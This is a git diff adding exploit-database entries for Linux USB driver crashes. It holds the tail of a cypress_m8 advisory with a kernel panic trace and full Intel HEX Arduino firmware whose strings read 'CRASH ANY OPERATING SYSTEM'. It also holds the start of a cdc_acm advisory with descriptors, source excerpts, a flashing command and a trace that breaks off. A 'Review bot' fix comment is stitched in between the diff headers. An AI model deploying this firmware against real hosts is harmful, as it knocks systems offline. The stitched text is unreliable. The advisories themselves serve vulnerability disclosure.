+[ 40.513393] [] usb_serial_probe+0x1123/0x1230
+[ 40.513393] [] ? ida_get_new_above+0x7c/0x2a0
+[ 40.513393] [] ? kmem_cache_alloc+0x1ba/0x1d0
+[ 40.513393] [] ? sysfs_addrm_finish+0x42/0xe0
+[ 40.513393] [] ? __sysfs_add_one+0x61/0x100
+[ 40.513393] [] usb_probe_interface+0x1c4/0x2f0
+[ 40.513393] [] driver_probe_device+0x87/0x390
+[ 40.513393] [] __driver_attach+0x93/0xa0
+[ 40.513393] [] ? __device_attach+0x40/0x40
+[ 40.513393] [] bus_for_each_dev+0x73/0xc0
+[ 40.513393] [] driver_attach+0x1e/0x20
+[ 40.513393] [] usb_serial_register_drivers+0x29b/0x580
+[ 40.513393] [] ? 0xffffffffa0398fff
+[ 40.513393] [] usb_serial_module_init+0x1e/0x1000
+[cypress_m8]
+[ 40.513393] [] do_one_initcall+0xb8/0x230
+[ 40.513393] [] load_module+0x133e/0x1b40
+[ 40.513393] [] ? ddebug_proc_write+0xf0/0xf0
+[ 40.513393] [] ? copy_module_from_fd.isra.42+0x53/0x150
+[ 40.513393] [] SyS_finit_module+0xa6/0xd0
+[ 40.513393] [] system_call_fastpath+0x16/0x1b
+[ 40.513393] Code: 03 e1 41 c7 84 24 38 01 00 00 00 01 00 00 5b 41 5c 44 89
+e8 41 5d 41 5e 5d c3 90 49 8b 84 24 78 01 00 00 4d 8d b4 24 b0 02 00 00 <44>
+8b 88 a8 00 00 00 44 89 4b 34 49 8b 84 24 58 01 00 00 44 8b
+[ 40.513393] RIP [] cypress_generic_port_probe+0x100/0x1a0
+[cypress_m8]
+[ 40.513393] RSP
+[ 40.513393] CR2: 00000000000000a8
+[ 41.005529] ---[ end trace b239663354a1c556 ]---
+[ 41.010284] Kernel panic - not syncing: Fatal exception
+[ 41.011253] drm_kms_helper: panic occurred, switching back to text console
+
+Arduino Leonardo Firmware:
+
+:100000000C94A8000C94C5000C94C5000C94C50079
+:100010000C94C5000C94C5000C94C5000C94C5004C
+:100020000C94C5000C94C5000C94C4050C942F04CA
+:100030000C94C5000C94C5000C94C5000C94C5002C
+:100040000C94C5000C94C5000C94C5000C94C5001C
+:100050000C94C5000C94C5000C94C5000C940E02C1
+:100060000C94C5000C94C5000C94C5000C94C500FC
+:100070000C94C5000C94C5000C94C5000C94C500EC
+:100080000C94C5000C94C5000C94C5000C94C500DC
+:100090000C94C5000C94C5000C94C5000C94C500CC
+:1000A0000C94C5000C94C5000C94C5000B030E0302
+:1000B000010305032F032F032F03120316031A0353
+:1000C000200324032F032A030000000200080E006F
+:1000D00000030401000B000000000000000000000D
+:1000E00000000000000004080201104080401020C1
+:1000F00040804080080204018040201002011080EE
+:100100001020404004040404040304050202020217
+:1001100004030202020206060606060604040202A0
+:100120000204000000002300260029002C002F00FC
+:1001300000000000250028002B002E0031000000E8 +:100140000000240027002A002D00300000C180811B +:1001500011241FBECFEFDAE0DEBFCDBF15E0A0E077 +:10016000B1E0E4EDF3E102C005900D92A436B107D1 +:10017000D9F725E0A4E6B5E001C01D92AF37B2077C +:10018000E1F70E94C8000C9404070C940000089545 +:10019000CF93DF93CDB7DEB7CD59D1090FB6F89421 +:1001A000DEBF0FBECDBF0E94A1020E94C70060E06B +:1001B00083E00E94300361E087E00E94300361E049 +:1001C00088E00E9430030E9459067E012AE9E20E6F +:1001D000F11C84E093E0D70111969C938E9389E003 +:1001E00094E013969C938E93129782E2E2E1F1E001 +:1001F0009E012F5F3F4F6901D90101900D928A95B1 +:10020000E1F788E1E4E3F1E0DE01939601900D92DD +:100210008A95E1F782E1ECE4F1E0DE01DB96019002 +:100220000D928A95E1F789E0EEE5F1E0DE01A05953 +:10023000BF4F01900D928A95E1F72A593F4F99E0FF +:10024000992ED901E92D1D92EA95E9F78E010957FA +:100250001F4F87E0E7E6F1E0D80101900D928A9503 +:10026000E1F7BE0160587F4F87E0EEE6F1E0DB0189 +:1002700001900D928A95E1F7AE0147585F4F87E0F4 +:10028000E5E7F1E0DA0101900D928A95E1F75E0170 +:10029000FEE8AF0EB11C86E0ECE7F1E0D50101907D +:1002A0000D928A95E1F7CE01835B9F4FEEE0DC0172 +:1002B0001D92EA95E9F7E3E0DC011996EC93D90188 +:1002C0009C92F4E01196FC9311971496EC93F9012B +:1002D000DC01292D01900D922A95E1F7FE01EC56E3 +:1002E000FF4FDC011B96FC93EE931A971D96BC9270 +:1002F000AE921C971183008373836283558344837A +:100300000C5211092CE0F80111922A95E9F721E02D +:10031000D80119962C931997FE01E059FF4F0190CF +:100320000D929A94E1F7F8019387828761E088E063 +:100330000E9469038BE492E00E94650688E892E0DF +:100340000E94650687EC92E00E94650686E093E0D5 +:100350000E94650682E493E00E9465068FE793E0C1 +:100360000E94650684EA93E00E9465068BEE93E0A6 +:100370000E94650683E00E949F03892B09F047C015 +:100380005E01F3E2AF0EB11C8824839482E1982EC3 +:1003900084E194E00E946506BF92AF92DF92CF9213 +:1003A000FF92EF921F928F921F930F932DB73EB73C +:1003B000225131090FB6F8943EBF0FBE2DBFADB725 +:1003C000BEB71196FE01FB96892D01900D928A957C +:1003D000E1F78DE695E00E94030668E873E180E0AE +:1003E00090E00E947B028DE695E00E944E0660E060 
+:1003F00087E00E94690368E873E180E090E00E9472 +:100400007B020FB6F894DEBF0FBECDBFC1CF6AE04E +:1004100070E080E090E00E947B02ACCF1F920F92D0 +:100420000FB60F9211242F933F938F939F93AF9307 +:10043000BF938091650590916605A0916705B09185 +:1004400068053091640523E0230F2D3720F40196D1 +:10045000A11DB11D05C026E8230F0296A11DB11DE7 +:10046000209364058093650590936605A0936705C6 +:10047000B09368058091690590916A05A0916B051C +:10048000B0916C050196A11DB11D809369059093F3 +:100490006A05A0936B05B0936C05BF91AF919F91D6 +:1004A0008F913F912F910F900FBE0F901F90189535 +:1004B0003FB7F8948091690590916A05A0916B050A +:1004C000B0916C0526B5A89B05C02F3F19F0019689 +:1004D000A11DB11D3FBF6627782F892F9A2F620F6C +:1004E000711D811D911D42E0660F771F881F991FA6 +:1004F0004A95D1F70895CF92DF92EF92FF92CF9372 +:10050000DF936B017C010E945802EB01C114D104FE +:10051000E104F10479F00E9458026C1B7D0B683EE7 +:100520007340A0F381E0C81AD108E108F108C8516E +:10053000DC4FECCFDF91CF91FF90EF90DF90CF9029 +:100540000895789484B5826084BD84B5816084BD4B +:1005500085B5826085BD85B5816085BDEEE6F0E03C +:10056000808181608083E1E8F0E010828081826098 +:100570008083808181608083E0E8F0E08081816019 +:100580008083E1E9F0E08081826080838081816006 +:100590008083E0E9F0E0808181608083E1ECF0E03D +:1005A000808184608083808182608083808181609B +:1005B0008083E3ECF0E0808181608083E0ECF0E018 +:1005C000808182608083E2ECF0E0808181608083C2 +:1005D000EAE7F0E0808184608083808182608083AC +:1005E000808181608083808180688083089590E02D +:1005F000FC013197EE30F10590F5EA5AFF4F0C946B +:10060000AB09809180008F7703C0809180008F7D3F +:1006100080938000089584B58F7702C084B58F7D64 +:1006200084BD0895809190008F7707C080919000DD +:100630008F7D03C080919000877F80939000089504 +:100640008091C0008F7703C08091C0008F7D809320 +:10065000C00008958091C200877F8093C2000895F2 +:10066000CF93DF9390E0FC01EA51FF4F2491FC010E +:10067000EC5FFE4F8491882349F190E0880F991F29 +:10068000FC01E25CFE4FA591B491805D9E4FFC01A0 +:10069000C591D4919FB7611108C0F8948C912095B1 +:1006A00082238C93888182230AC0623051F4F894AB 
+:1006B0008C91322F309583238C938881822B888371 +:1006C00004C0F8948C91822B8C939FBFDF91CF91C3 +:1006D00008950F931F93CF93DF931F92CDB7DEB78B +:1006E000282F30E0F901E853FF4F8491F901EA51D6 +:1006F000FF4F1491F901EC5FFE4F04910023C9F004 +:10070000882321F069830E94F7026981E02FF0E0DD +:10071000EE0FFF1FE05DFE4FA591B4919FB7F894D7 +:100720008C91611103C01095812301C0812B8C93A2 +:100730009FBF0F90DF91CF911F910F910895CF939D +:10074000DF93282F30E0F901E853FF4F8491F9013E +:10075000EA51FF4FD491F901EC5FFE4FC491CC23D5 +:1007600091F081110E94F702EC2FF0E0EE0FFF1FD5 +:10077000EE5DFE4FA591B4912C912D2381E090E088 +:1007800021F480E002C080E090E0DF91CF910895F5 +:10079000615030F02091F100FC0120830196F8CFE8 +:1007A000289884E680937D0508951092E9001092C0 +:1007B00071051092700590936F0580936E050895F2 +:1007C000FF920F931F93CF93DF93F82E8B01EA01D3 +:1007D000BA01C8010E94A606F80120E030E08EEFC1 +:1007E0002C173D0791F1F7FE02C0A49101C0A08132 +:1007F000609170057091710540916E0550916F0583 +:1008000064177507ACF49091E8009570E1F390914E +:10081000E80092FD1CC0A093F100A0917005B0917A +:1008200071051196AF73BB27AB2B11F48093E800D1 +:10083000A0917005B09171051196B0937105A093C8 +:1008400070052F5F3F4F3196CBCFC90102C08FEFAC +:100850009FEFDF91CF911F910F91FF9008951F920D +:100860000F920FB60F9211246F927F928F929F92E8 +:10087000AF92BF92CF92DF92EF92FF920F931F93AE +:100880002F933F934F935F936F937F938F939F9398 +:10089000AF93BF93EF93FF93CF93DF93CDB7DEB7C3 +:1008A0006297DEBFCDBF1092E9008091E80083FF20 +:1008B00046C168E0CE010A960E94C80382EF809389 +:1008C000E8009A8597FF05C08091E80080FFFCCF83 +:1008D00003C08EEF8093E800892F807609F023C152 +:1008E0008B85811105C01092F1001092F10020C19A +:1008F000282F2D7F213009F41BC1853049F48091C8 +:10090000E80080FFFCCF8C8580688093E30010C1F5 +:10091000863009F0E1C02D8508891989223009F057 +:10092000B3C0EC848E2D90E0209173053091740556 +:10093000821793070CF09FC00E94D5031F92EF927D +:100940008DE394E09F938F930E9483068CE0E89E52 +:1009500070011124E0917505F0917605EE0DFF1DF3 +:1009600089E0DE01119601900D928A95E1F7C801A8 
+:100970000E94D50349E050E0BE016F5F7F4F80E0E9 +:100980000E94E0030F900F900F900F90C12CD12C7C +:10099000612C712C33E7A32E34E0B32E4AEA842E67 +:1009A00044E0942EE0917505F0917605EE0DFF1D63 +:1009B000818590E0681679060CF0BAC07F926F923C +:1009C000BF92AF920E948306E0917505F091760583 +:1009D000EE0DFF1D628573856C0D7D1D49E050E0B5 +:1009E00080E00E94E0030F900F900F900F9000E0C6 +:1009F00010E0E0917505F0917605EE0DFF1D028483 +:100A0000F385E02DEC0DFD1D818590E00817190799 +:100A10005CF51F930F939F928F920E948306E09143 +:100A20007505F0917605EE0DFF1D0284F385E02D2E +:100A3000EC0DFD1DC801880F991FA485B585A80F71 +:100A4000B91F4D915C910284F385E02DE80FF91FE9 +:100A50006081718180E00E94E0030F5F1F4F0F9063 +:100A60000F900F900F90C5CF8FEF681A780A8EE025 +:100A7000C80ED11C97CF8FED94E09F938F930E9467 +:100A800083060F900F9058C0C8012A8B0E94D5038F +:100A90002A892130C1F0233009F04EC08C851F9285 +:100AA0008F9389EF94E09F938F930E94830642E097 +:100AB00050E062E871E080E00E94E0030F900F9048 +:100AC0000F900F9035C04091000150E060E071E060 +:100AD00080E00E94E0032CC0873071F1883021F45F +:100AE00081E08093F10024C0893011F5937021F5E5 +:100AF000EDE4F1E081E021E096E38093E9002093CA +:100B0000EB0034913093EC009093ED008F5F3196C1 +:100B1000843099F78EE78093EA001092EA008C8582 +:100B20008093720505C0888999890E94D50304C005 +:100B30008EEF8093E80003C081E28093EB00629621 +:100B40000FB6F894DEBF0FBECDBFDF91CF91FF91FE +:100B5000EF91BF91AF919F918F917F916F915F9135 +:100B60004F913F912F911F910F91FF90EF90DF9048 +:100B7000CF90BF90AF909F908F907F906F900F908D +:100B80000FBE0F901F9018951F920F920FB60F92E5 +:100B900011248F939F938091E1001092E10083FFD5 +:100BA0000FC01092E90091E09093EB001092EC00DE +:100BB00092E39093ED001092720598E09093F0000C +:100BC00082FF1AC080917E05882339F080917E05CE +:100BD000815080937E05882369F080917D0588236C +:100BE00059F080917D05815080937D05811104C06D +:100BF000289A02C05D9AF1CF9F918F910F900FBEFE +:100C00000F901F901895CF93DF93CDB7DEB782E199 +:100C1000FE013596A0E0B1E001900D928A95E1F7D2 +:100C20008F89988D9093760580937505898D9A8D1F 
+:100C300090937405809373058B8D9C8D90937C05A8 +:100C400080937B058D8D9E8D90937A058093790599 +:100C50008F8D98A1909378058093770510927205F7 +:100C600081E08093D70080EA8093D80082E189BD3B +:100C700009B400FEFDCF61E070E080E090E00E94EA +:100C80007B0280E98093D8008CE08093E200109290 +:100C9000E000559A209ADF91CF91089581E08093EA +:100CA000E00008959091C80095FFFCCF8093CE009E +:100CB00008951092CD0087E68093CC0088E1809360 +:100CC000C9008EE08093CA0008950F931F93CF93BD +:100CD000DF93EC018C01FE0101900020E9F73197D0 +:100CE000EC1BFD0BC8018C1B9D0B8E179F0730F46E +:100CF000F80181918F010E945206EDCFDF91CF91D3 +:100D00001F910F910895CF93DF93CDB7DEB7DA959A +:100D10000FB6F894DEBF0FBECDBFFE01EB5FFE4FF6 +:100D2000419151919F0160E071E0CE0101960E94D6 +:100D30000707CE0101960E946506D3950FB6F89479 +:100D4000DEBF0FBECDBFDF91CF9108958F929F92EE +:100D5000AF92BF92CF92DF92EF92FF920F931F93C9 +:100D6000CF93DF9300D0CDB7DEB75B0122E535E04E +:100D70003F932F9389839A830E9483068981882ECB +:100D80009A81992E0F900F9000E010E08EE5E82EEA +:100D900085E0F82E91E1C92E94E0D92E0A151B05A5 +:100DA000E4F4F40181914F0190E09F938F93FF92BF +:100DB000EF920E9483060F5F1F4FC8018F70992723 +:100DC0000F900F900F900F90892B41F7DF92CF92E9 +:100DD0000E9483060F900F90E1CF81E194E09F93F2 +:100DE0008F930E9483060F900F900F900F90DF91CA +:100DF000CF911F910F91FF90EF90DF90CF90BF9018 +:100E0000AF909F908F900895F8940C94E809AEE00D +:100E1000B0E0EDE0F7E00C94BF098C01CA0146E0B8 +:100E20004C831A83098377FF02C060E070E8615049 +:100E300071097E836D83A901BC01CE0101960E94D8 +:100E400033074D815E8157FD0AC02F8138854217D7 +:100E500053070CF49A01F801E20FF31F10822E964B +:100E6000E4E00C94DB09ACE0B0E0E9E3F7E00C94DB +:100E7000B1097C016B018A01FC0117821682838112 +:100E800081FFBDC1CE0101964C01F7019381F601AE +:100E900093FD859193FF81916F01882309F4ABC184 +:100EA000853239F493FD859193FF81916F018532ED +:100EB00029F4B70190E00E941B09E7CF512C312C97 +:100EC00020E02032A0F48B3269F030F4803259F007 +:100ED000833269F420612CC08D3239F0803339F4CB +:100EE000216026C02260246023C0286021C027FD25 
+:100EF00027C030ED380F3A3078F426FF06C0FAE00C +:100F00005F9E300D1124532E13C08AE0389E300DA1 +:100F10001124332E20620CC08E3221F426FD6BC1C9 +:100F2000206406C08C3611F4206802C0883641F473 +:100F3000F60193FD859193FF81916F018111C1CFDE +:100F4000982F9F7D9554933028F40C5F1F4FFFE33B +:100F5000F9830DC0833631F0833771F0833509F0A2 +:100F60005BC022C0F801808189830E5F1F4F44243B +:100F70004394512C540115C03801F2E06F0E711CDE +:100F8000F801A080B18026FF03C0652D70E002C08B +:100F90006FEF7FEFC5012C870E9410092C018301A0 +:100FA0002C852F77222E17C03801F2E06F0E711CAE +:100FB000F801A080B18026FF03C0652D70E002C05B +:100FC0006FEF7FEFC5012C870E9405092C012C854E +:100FD0002068222E830123FC1BC0832D90E048163D +:100FE0005906B0F4B70180E290E00E941B093A94E0 +:100FF000F4CFF50127FC859127FE81915F01B701B0 +:1010000090E00E941B0931103A94F1E04F1A510808 +:101010004114510471F7E5C0843611F0893639F571 +:10102000F80127FF07C060817181828193810C5F85 +:101030001F4F08C060817181882777FD8095982FA8 +:101040000E5F1F4F2F76B22E97FF09C090958095A7 +:10105000709561957F4F8F4F9F4F2068B22E2AE089 +:1010600030E0A4010E944D09A82EA81844C085377D +:1010700029F42F7EB22E2AE030E025C0F22FF97F2E +:10108000BF2E8F36C1F018F4883579F0B4C08037A0 +:1010900019F0883721F0AFC02F2F2061B22EB4FE97 +:1010A0000DC08B2D8460B82E09C024FF0AC09F2F6D +:1010B0009660B92E06C028E030E005C020E130E09F +:1010C00002C020E132E0F801B7FE07C06081718103 +:1010D000828193810C5F1F4F06C06081718180E027 +:1010E00090E00E5F1F4FA4010E944D09A82EA81882 +:1010F000FB2DFF77BF2EB6FE0BC02B2D2E7FA51428 +:1011000050F4B4FE0AC0B2FC08C02B2D2E7E05C0E0 +:101110007A2C2B2D03C07A2C01C0752C24FF0DC016 +:10112000FE01EA0DF11D8081803311F4297E09C092 +:1011300022FF06C07394739404C0822F867809F04E +:10114000739423FD13C020FF06C05A2C731418F4A7 +:10115000530C5718732C731468F4B70180E290E0B5 +:101160002C870E941B0973942C85F5CF731410F4FF +:10117000371801C0312C24FF12C0B70180E390E082 +:101180002C870E941B092C8522FF17C021FF03C05A +:1011900088E590E002C088E790E0B7010CC0822F9C +:1011A000867859F021FD02C080E201C08BE227FD64 
+:1011B0008DE2B70190E00E941B09A51438F4B70135 +:1011C00080E390E00E941B095A94F7CFAA94F4019F +:1011D000EA0DF11D8081B70190E00E941B09A1106A +:1011E000F5CF332009F451CEB70180E290E00E94A0 +:1011F0001B093A94F6CFF7018681978102C08FEFE1 +:101200009FEF2C96E2E10C94CD09FC010590615012 +:1012100070400110D8F7809590958E0F9F1F08950C +:10122000FC016150704001900110D8F780959095B5 +:101230008E0F9F1F08950F931F93CF93DF93182F47 +:10124000092FEB018B8181FD03C08FEF9FEF20C041 +:1012500082FF10C04E815F812C813D814217530770 +:101260007CF4E881F9819F012F5F3F4F3983288308 +:10127000108306C0E885F985812F0995892B29F708 +:101280002E813F812F5F3F4F3F832E83812F902FF1 +:10129000DF91CF911F910F910895FA01AA2728306D +:1012A00051F1203181F1E8946F936E7F6E5F7F4F33 +:1012B0008F4F9F4FAF4FB1E03ED0B4E03CD0670FAF +:1012C000781F891F9A1FA11D680F791F8A1F911D02 +:1012D000A11D6A0F711D811D911DA11D20D009F452 +:1012E00068943F912AE0269F11243019305D319394 +:1012F000DEF6CF010895462F4770405D4193B3E07D +:101300000FD0C9F7F6CF462F4F70405D4A3318F023 +:10131000495D31FD4052419302D0A9F7EACFB4E0D4 +:10132000A6959795879577956795BA95C9F700978C +:101330006105710508959B01AC010A2E069457952D +:10134000479537952795BA95C9F7620F731F841F84 +:10135000951FA01D0895EE0FFF1F0590F491E02D3D +:1013600009942F923F924F925F926F927F928F9249 +:101370009F92AF92BF92CF92DF92EF92FF920F9324 +:101380001F93CF93DF93CDB7DEB7CA1BDB0B0FB62E +:10139000F894DEBF0FBECDBF09942A8839884888EB +:1013A0005F846E847D848C849B84AA84B984C88481 +:1013B000DF80EE80FD800C811B81AA81B981CE0F78 +:1013C000D11D0FB6F894DEBF0FBECDBFED0108955D +:0413D000F894FFCFBF +:1013D4001201000200000040AD0BEFBE000101024B +:1013E4000001220342006100640020004200410029 +:1013F40042004500250078002500780025006E0095 +:1014040025007000180342004100440020004300FE +:10141400300046004600450045002100120100024C +:1014240000000040B4040055000101020301090258 +:10143400270001010000FA0705810304040C0705D5 +:10144400010204000C0705820104000C07000700D8 +:101454000700480100500072006F006C00690066CC 
+:101464000069006300000A550000006BFD180A00C3 +:10147400809F0AB901312B940A8101128946001315 +:10148400000257028B0A5E0AF80A5F01F212010099 +:1014940002010000400D055702000101020301B9D9 +:1014A4000A0100F80A5F0A810A220342006100640B +:1014B400002000420041004200450025007800253C +:1014C40000780025006E00250070001803420041DA +:1014D400004400200043003000460046004500451B +:1014E40000210012010002010000400D0557020016 +:1014F400010102030109040000030100000003F2DA +:101504000AEC0A0902270001010000FA01AB0A09EA +:101514000400000301000000090200202020202014 +:101524005F5F5F5F5F5F5F5F2020202020202020BF +:1015340020202020202020202020202020202020A7 +:1015440020205F5F5F5F5F205F5F20205F2020209F +:101554002020205F5F0A0D00202020202F205F5FC5 +:101564005F5F2F202F5F20205F5F5F5F205F5F5FE3 +:101574005F5F20205F5F5F5F5F20202020202F209F +:101584005F5F5F2F2F202F5F285F295F5F5F5F2FD3 +:10159400202F5F5F0A0D002020202F202F202020E5 +:1015A4002F205F5F205C2F205F5F20602F205F5F14 +:1015B400205C2F205F5F5F2F5F5F5F5F205C5F5F5A +:1015C400205C2F205F5F2F202F205F5F5F2F202F55 +:1015D4002F5F2F0A0D0020202F202F5F5F5F2F2009 +:1015E4002F202F202F202F5F2F202F202F5F2F2001 +:1015F400285F5F2020292F5F5F5F2F205F5F2F20F0 +:101604002F202F5F2F202F202F5F5F2F202C3C0AAD +:101614000D0020205C5F5F5F5F2F5F2F202F5F2F07 +:101624005C5F5F2C5F2F5C5F5F5F5F2F5F5F5F5F5F +:101634002F20202020202F5F5F5F5F2F5C5F5F2FB4 +:101644005F2F5C5F5F5F2F5F2F7C5F7C0A0D002044 +:101654003C3C2043485241534820414E59204F506E +:1016640045524154494E472053595354454D203E09 +:101674003E0A0D00203C3C202863292053657267F4 +:10168400656A20536368756D696C6F20323031353B +:101694002C204F70656E536F7572636520536563BC +:1016A40075726974792052616C66205370656E6E30 +:1016B4006562657267203E3E0A0D000A3E3E205078 +:1016C4007265737320627574746F6E20746F207307 +:1016D4007461727420657865637574696F6E2E2EFB +:1016E4002E0A0D005B44454255475D2045786563ED +:1016F400757465207061796C6F616420300A0D0027 +:10170400526563762D446174613A0A0D005B444569 +:101714004255475D200953656E6420436F6E6669C8 
+:101724006775726174696F6E44657363726970740E +:101734006F720928696E6465783A2569292E2E2E00 +:101744000D0A005B44454255475D200953656E64AC +:1017540020496E74657266616365204465736372C3 +:101764006970746F720928696E7465726661636565 +:101774003A2569292E2E2E0D0A005B444542554711 +:101784005D200953656E6420456E64706F696E74E4 +:101794002044657363726970746F720928656E649E +:1017A400706F696E743A2569292E2E2E0D0A005B1E +:1017B40044454255475D203C3C70616E6963206D31 +:1017C4006F64653F3E3E0D0A005B44454255475DEC +:1017D4002009203E3E20537472696E67204465736D +:1017E40063726970746F72207265717565737420A9 +:1017F4002D2073656E64696E67206D616C666F720F +:101804006D656420737472696E67212073657475E5 +:10181400702E7756616C75654C203D3D2025690D11 +:101824000A005B48455844554D505D0A0D0025306B +:041834003258200006 +:00000001FF +-- \ No newline at end of file diff --git a/platforms/linux/dos/39543.txt b/platforms/linux/dos/39543.txt new file mode 100755 index 000000000..a0dd20556 --- /dev/null +++ b/platforms/linux/dos/39543.txt 
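Review bot: The quoted cypress_m8.c excerpt at lines 488-489 shows the root cause the advisory describes but never states as a fix: cypress_generic_port_probe reads `port->interrupt_out_urb->interval` and `port->interrupt_in_urb->interval` without first checking that the usb-serial core allocated both URBs, so the configuration descriptor above it (a single interrupt-IN endpoint, two bulk endpoints) leaves interrupt_out_urb NULL and produces the dereference at offset 0xa8 in the trace. The defensive change belongs before that else-branch, e.g. `if (!port->interrupt_out_urb || !port->interrupt_in_urb) return -ENODEV;`, which fails the probe for a malformed device instead of panicking; upstream appears to have adopted an endpoint sanity check of this shape later, though the advisory records no vendor patch. For detection, the `BUG: unable to handle kernel NULL pointer dereference` line with `cypress_generic_port_probe` in the RIP immediately after `HID->COM RS232 Adapter converter detected` is the signature to alert on, and since the advisory notes physical access is required, restricting which USB devices a host authorizes is the practical interim mitigation. The `CVE: not yet assigned` header will be stale by the time this entry is merged and should be reconciled against the Red Hat bug the References section cites.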
@@ -0,0 +1,624 @@
+OS-S Security Advisory 2016-06
+Linux cdc_acm Nullpointer Dereference
+
+Date: March 4th, 2016
+Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg
+CVE: not yet assigned
+CVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)
+Title: Local RedHat Enterprise Linux DoS â?? RHEL 7.1 Kernel crashes on invalid
+USB device descriptors (cdc_acm driver)
+Severity: Critical. The Kernel panics. A reboot is required.
+Ease of Exploitation: Trivial
+Vulnerability type: Wrong input validation
+Products: RHEL 7.1 including all updates
+Kernel-Version: 3.10.0-229.20.1.el7.x86_64 (for debugging-purposes we used the
+CentOS Kernel kernel-debuginfo-3.10.0-229.14.1.el7)
+Vendor: Red Hat
+Vendor contacted: November, 12th 2015
+PDF of Advisory: https://os-s.net/advisories/OSS-2016-06_cdc_acm.pdf
+
+Abstract:
+The Kernel 3.10.0-229.20.1.el7.x86_64 crashes on presentation of a buggy USB
+device requiring the cdc_acm driver.
+
+Detailed product description:
+We confirmed the bug on the following system:
+RHEL 7.1
+Kernel 3.10.0-229.20.1.el7.x86_64
+Further products or kernel versions have not been tested.
+How reproducible: Always
+Actual results: Kernel crashes.
+
+Description:
+The bug was found using the USB-fuzzing framework vUSBf from Sergej Schumilo
+(github.com/schumilo) using the following device descriptor:
+
+[*] Device-Descriptor
+bLength: 0x12
+bDescriptorType: 0x1
+bcdUSB: 0x200
+bDeviceClass: 0x3
+bDeviceSubClass: 0x0
+bDeviceProtocol: 0x0
+bMaxPacketSize: 0x40
+idVendor: 0x482
+idProduct: 0x203
+bcdDevice: 0x100
+iManufacturer: 0x1
+iProduct: 0x2
+iSerialNumbers: 0x3
+bNumConfigurations: 0x1
+
+This is the configuration descriptor containing only one interface descriptor.
+The cdc-acm driver assumes that there will be at least two interface-
+descriptors with associated endpoint-descriptors.
+Since the cdc-acm driver is expecting a second interface descriptor, the
+driver tries to dereference a null-pointer.
+This results in a crash of the system.
+
+****
+$ nm cdc-acm.ko.debug | grep acm_probe
+0000000000001530 t acm_probe
+$ addr2line -e cdc-acm.ko.debug 0x179C
+/usr/src/debug/kernel-3.10.0-229.14.1.el7/linux-3.10.0-229.14.1.el7.x86_
+64/drivers/usb/class/cdc-
+acm.c:1229
+****
+
+**** CentOS-Kernel linux-3.10.0-229.14.1.el7 (drivers/usb/class/cdc-acm.c)
+...
+1093 /* handle quirks deadly to normal probing*/
+1094 if (quirks == NO_UNION_NORMAL) {
+1095 data_interface = usb_ifnum_to_if(usb_dev, 1); /* possible null-
+pointer */
+1096 control_interface = usb_ifnum_to_if(usb_dev, 0);
+1097 goto skip_normal_probe;
+1098 }
+...
+1226 skip_normal_probe:
+1227
+1228 /*workaround for switched interfaces */
+1229 if (data_interface->cur_altsetting->desc.bInterfaceClass /* null-
+pointer dereference */
+1230 != CDC_DATA_INTERFACE_TYPE) {
+1231 if (control_interface->cur_altsetting->desc.bInterfaceC
+...
+****
+
+[*] Configuration-Descriptor
+bLength: 0x9
+bDescriptorType: 0x2
+wTotalLength: 0x27
+bNumInterfaces: 0x1
+bConfigurationValue: 0x1
+iConfiguration: 0x0
+bmAttributes: 0x0
+bMaxPower: 0x31
+[*] Interface-Descriptor
+bLength: 0x9
+bDescriptorType: 0x4
+bInterfaceNumber: 0x0
+bAlternateSetting: 0x0
+bNumEndpoints: 0x0
+bInterfaceClass: 0x0
+bInterfaceSubClass: 0x0
+bInterfaceProtocol: 0x0
+[*] Endpoint-Descriptor:
+bLength: 0x7
+bDescriptorType: 0x5
+bEndpointAddress: 0x81
+bmAttribut: 0x3
+wMaxPacketSize: 0x404
+bInterval: 0xc
+[*] Endpoint-Descriptor:
+bLength: 0x7
+bDescriptorType: 0x5
+bEndpointAddress: 0x1
+bmAttribut: 0x2
+wMaxPacketSize: 0x4
+bInterval: 0xc
+[*] Endpoint-Descriptor:
+bLength: 0x7
+bDescriptorType: 0x5
+bEndpointAddress: 0x82
+bmAttribut: 0x1
+wMaxPacketSize: 0x4
+bInterval: 0xc
+
+Proof of Concept:
+For a proof of concept, we are providing an Arduino Leonardo firmware file. This
+firmware will emulate the defective USB device.
+
+avrdude -v -p ATMEGA32u4 -c avr109 -P /dev/ttyACM0 -b 57600 -U
+flash:w:binary.hex
+
+The firmware has been attached to this bug report.
+To prevent the automated delivery of the payload, a jumper may be used to
+connect port D3 and 3V3!
+
+Severity and Ease of Exploitation:
+The vulnerability can be easily exploited. Using our Arduino Leonardo firmware,
+only physical access to the system is required.
+
+Vendor Communication:
+We contacted Red Hat on the November, 12th 2015.
+To this day, no security patch was provided by the vendor.
+Since our 90-day Responsible Discourse deadline is expired, we publish this
+Security Advisory.
+
+References:
+https://bugzilla.redhat.com/show_bug.cgi?id=1283366
+
+Kernel Stacktrace:
+
+[ 32.550821] usb 1-1: new full-speed USB device number 2 using xhci_hcd
+[ 32.765575] usb 1-1: New USB device found, idVendor=0482, idProduct=0203
+[ 32.775042] usb 1-1: New USB device strings: Mfr=1, Product=2,
+SerialNumber=3
+[ 32.780788] usb 1-1: Product: Ä?
+[ 32.783389] usb 1-1: Manufacturer: Ä?
+[ 32.786534] usb 1-1: SerialNumber: %
+[ 32.794914] usb 1-1: ep 0x81 - rounding interval to 64 microframes, ep desc
+says 96 microframes
+[ 32.850587] BUG: unable to handle kernel NULL pointer dereference at
+0000000000000008
+[ 32.851028] IP: [] acm_probe+0x26c/0x11d0 [cdc_acm]
+[ 32.851028] PGD 0
+[ 32.851028] Oops: 0000 [#1] SMP
+[ 32.851028] Modules linked in: cdc_acm(+) ip6t_rpfilter ip6t_REJECT
+ipt_REJECT xt_conntrack ebtable_nat ebtable_broute bridge stp llc
+ebtable_filter ebtables ip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6
+nf_nat_ipv6 ip6table_mangle ip6table_security ip6table_raw ip6table_filter
+ip6_tables iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat
+nf_conntrack iptable_mangle iptable_security iptable_raw iptable_filter
+ip_tables bochs_drm ppdev syscopyarea sysfillrect sysimgblt ttm drm_kms_helper
+drm pcspkr i2c_piix4 i2c_core serio_raw parport_pc parport xfs libcrc32c
+sd_mod sr_mod crc_t10dif cdrom crct10dif_common ata_generic pata_acpi ata_piix
+libata e1000 floppy dm_mirror dm_region_hash dm_log dm_mod
+[ 32.851028] CPU: 0 PID: 2220 Comm: 
